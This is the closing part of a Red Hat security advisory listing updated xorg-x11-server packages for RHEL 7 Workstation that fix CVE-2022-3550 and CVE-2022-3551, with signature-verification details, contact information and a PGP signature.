xorg-x11-server-devel-1.20.4-19.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
xorg-x11-server-1.20.4-19.el7_9.src.rpm

x86_64:  
xorg-x11-server-Xephyr-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xorg-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-common-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
xorg-x11-server-source-1.20.4-19.el7_9.noarch.rpm

x86_64:  
xorg-x11-server-Xdmx-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xnest-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xvfb-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-Xwayland-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-debuginfo-1.20.4-19.el7_9.x86_64.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.i686.rpm  
xorg-x11-server-devel-1.20.4-19.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3550  
https://access.redhat.com/security/cve/CVE-2022-3551  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3TdztzjgjWX9erEAQh7EQ//e2uR00MH8rSXUcWWCH5uXJiuMY9TDdpG  
O+7zT+8hTue1bxulTSoGm3H+sgFg0QtGCWzwc5/mXkJyKIVWFiMP+IqmoX53Cl3g  
E/Iay8Q3iubcCgR2HAPD4vu4ZzzeIBVUe0RHoTdhiqs2Au8raKdoWsU1ZeE65lD9  
mc/GNwzugMyyqKDCRbxh4GpqwYU/P9bQEBaVZq8Jz8eRc6UdGPmd7V+P9E7VuyGd  
AERmfuKUb70tdSToAWUKBNjQnfgPHP3fC10xFEqm9nhyswxrQEH+eYF2rkp0TfyT  
y9C/KF98hiiNy46i9pS8QV/tkAVaDwOgFcZ1GnOk+AsfWCrqbmU/9HzEznmY5An7  
v4v+ObIRiJMJdEiDMtT1oCKWPWmIdGF57I1a/xnDHT6441gmsOX/ZzcBnBChoUvZ  
37aw70WN6sWZUFWWX+QJTGOqiWlbExbak9MiNRZ6bAYwt537o7Y6yDra7+K3YB/A  
P3whL4wsG5Rge/XjVv110kijTGpj3v5wOYmVbsy80a/d/vvBJGQ/UJb1fEA8Hwdc  
u9NudLg5aKOEbADe/EGRWPNm7JGG2x/st23XfMZQjNR6I1oitHNTaVee+8bJHiV+  
kf71vnnq9wDVm3fvK0fEW4MtJCSl3VWtxJXSgCrCAtJ0vtSBD4ZRl0RUipT2XuNL  
LMV4KibkhLM=h54m  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#php